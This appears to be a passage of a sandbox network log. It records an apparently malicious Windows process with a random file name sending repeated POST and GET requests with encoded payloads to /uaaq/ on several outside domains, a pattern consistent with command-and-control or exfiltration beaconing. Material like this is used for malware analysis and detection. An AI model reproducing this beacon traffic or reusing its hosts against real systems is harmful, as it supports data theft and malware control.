                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:13.139214039 CET | 1143 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    53 | 192.168.11.30 | 49807 | 203.175.9.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:19.339960098 CET | 710 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jKCZ5x03NBT3oXsRy9koTkxnQprSAeWEWSCPC+n4idMuK1zzWZirQMpRJaZVl5RIx9QcGZDwn1gFSLeCjXhjUrrXYLtKV9ujrTecqLbuzqPwaZLnC7rwIXIaZjSS8Xfky+LQamrMFp7CPmWn787fvMnJAgta5iX0r7++2w9KjvZQVnaewQ==
                                                                                    Dec 4, 2023 12:08:19.690722942 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:18 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                    Dec 4, 2023 12:08:19.690759897 CET | 244 | IN
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    54 | 192.168.11.30 | 49809 | 203.175.9.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:22.224276066 CET | 730 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jKCZ5x03NBT3q2cR3aIoCUxoMZrSO+XDWSOPC8LS3/ouTUjzXcWrXMpRRKYd6JRDx9suGbXwnxIFSKuCjg1gV7rJTrtEKNujrTecqLfEzqXwaI7nDarzB3IbQDSS23fgy+LuajLqFrzCPnKnqIXe4cn1fws/5mOtmcaD3RJ6/9sAUy2N3l+bglF/W7N5CMSuUux0nTs=
                                                                                    Dec 4, 2023 12:08:22.580862999 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:21 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
Dec 4, 2023 12:08:22.580887079 CET | 244 | IN
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.30 | 49812 | 203.175.9.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:08:25.106023073 CET | 1647 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:08:25.471582890 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:24 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
Dec 4, 2023 12:08:25.471645117 CET | 244 | IN
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.11.30 | 49816 | 203.175.9.19 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:08:27.988677025 CET | 430 | OUT | GET /uaaq/?9pG0L=uIq56BIwEgOtiyQr6743FVEUWeewfIvBTD+QAd7G5aNLRXmwRIDTY8coJ7Y84KRozcEAIYfXjUIHNLCJhW9aa5jrQ6gGBb360w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:08:28.347040892 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:27 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
Dec 4, 2023 12:08:28.347094059 CET | 244 | IN
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.11.30 | 49817 | 66.96.162.142 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:08:36.495969057 CET | 430 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1
                                                                                    Host: www.90dayleaderlab.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:08:36.599303961 CET | 813 | IN | HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:36 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 347
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Location: https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 04 Dec 2023 12:03:37 GMT
                                                                                    Age: 299
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&amp;9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.11.30 | 49818 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:08:41.794485092 CET | 728 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
Dec 4, 2023 12:08:41.977145910 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:41 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.30 | 49819 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:08:44.497402906 CET | 748 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2BQwaAXbKf7sPYI0LVn1/R7YlG0Ni5TsjJuzQM7Rtrm1dgWyIwGF5pGm7wLVd/47BG0TrJcilLRYm0SV42OC3st5gU61Si5ct/H9ARI6z7Vq59nC3EQxhyRPQ6cOlplJpJyBRWoxo3bc7tQURe14/0HmRpYfig=
                                                                                    Dec 4, 2023 12:08:44.680454016 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:44 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    60 | 192.168.11.30 | 49820 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:47.199816942 CET | 1665 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=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
                                                                                    Dec 4, 2023 12:08:47.382878065 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:47 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    61 | 192.168.11.30 | 49821 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:49.902487040 CET | 436 | OUT | GET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:50.085201025 CET | 161 | IN | HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:08:49 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    62 | 192.168.11.30 | 49822 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:55.266527891 CET | 686 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/0hEsF7J1PbUkaJ7cxWKTFIIjGyg2Wpz/WHdluKjBH+9s8cnZz3qJRu03DmE7+crJXWSkQug/l1pazZtHT+Dcc4/VzI5+R3SHTD1q8dXdvxLDokpq/KoM/9XfheBJ9FiMMx2V0kokBSDYjytgFYBz2nm/NR6pjPe2mja5wQ==
                                                                                    Dec 4, 2023 12:08:55.437577009 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    63 | 192.168.11.30 | 49823 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:08:57.964075089 CET | 706 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wbn/WnNlvIbBG+9s08nc33qSRu5KDjE7+c/JXXikRcI8klpY85t/MuDcc4/VzMQpR3aHT29q+/veiRLM/Upqu6oA/9XHhfcS9GaMMwGV01ojPSDa+isxKoB58FrlJD+/6ML6qW2q3jrhVqIAhtPnL7SQYJJLjDM=
                                                                                    Dec 4, 2023 12:08:58.131747007 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    64 | 192.168.11.30 | 49824 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:09:00.652368069 CET | 1623 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wb//WU1ltpbBF+9s6cnd33rIRuhGDjBZ+YPJWx2kAYc8tlpYkJtET+DFc4vvzI8pR3aHTxNq5tXegRLDokor/KpX/8/XhfZn926MMQWV2HQjHSDU9ispKoMj8FmUJDmZ6Pb6nBG1khbYP8QRu9HMK+utBMNP0nq3PdIzs9G/uktyuozWQGIhiGlzAg2fAaqXImf/a5Warh/CJROj1BOqPuAFYCth6Ga4VtdwxMn7BPP+TXMqcN7CVZOZGDktzAK0SOYqIBNwqZEhADNFOHG1F4Rrn7aoOyo/vP+EClkxUPbDh3WhDI8nTyKP/hxxCPhukPV0pyaXpRkmYl39Ipj0JyRnvI/5F4XZh5DxDGeVe/YBb2ri7oZ8l/WCth5+/YfOFYqcUXdDmo+ULqis0zVacv1izlFe10NJWgbzMQIj3waoQ7fl6tMQObUmF0xZpEtjonxSvmd4VufdkP3r24aDTXX/eoodJBwdB8sLnJsBkZ466aIcnY0BM2o779JSqR9OLaaiqEZvyttKMml7ItA7JoAHIzkVwH5xns+wIKX9B5A6TpA9fDQAU+7FY6usyuXtEfndXLFmnABMgUSirhfdD5RybW+hcIcue8yIrZtJk2xVwMRm+CLwGH+BcZLpgnva5Ns7rbMToGwZAFr60Wk7+4wgCFfzY7IE910ePqDDD6skUMSoayEfW2hTXrl9qIvVa17IYKksRLEl06HR8DjDFtuv5vBcf3DX6wkifRWI1d0te///rAX7xgTzlVG/9LnC6P/LXPzlPS1ADV+WKXhHeWrMcFBWvleb/cmvfQSoWCXeDMNZtFu9q7y8GJqTNLyix3kdYAG8Zzw9GC9IK/tQCjHQws4R7hRYLwxtoRxgSjNX+20NdJX5JmS0+zQXkeOTTjvw4yBhFTuR+iWgqEaKebXF/PHmDYdShMa+bO+/HqHmBqkef79XEgWA+3E8H8tK+RTetu4LnDOKVW4rpQ93gENd+9lVgzhsC8eQ7qikUSijynt1ytvw0suNbMwONCIDUMpaoRNuglf2OVwxMO2tAJnZcze2yliWz7qNftxeTjv66C8J9K+E
                                                                                    Dec 4, 2023 12:09:00.822199106 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    65 | 192.168.11.30 | 49825 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
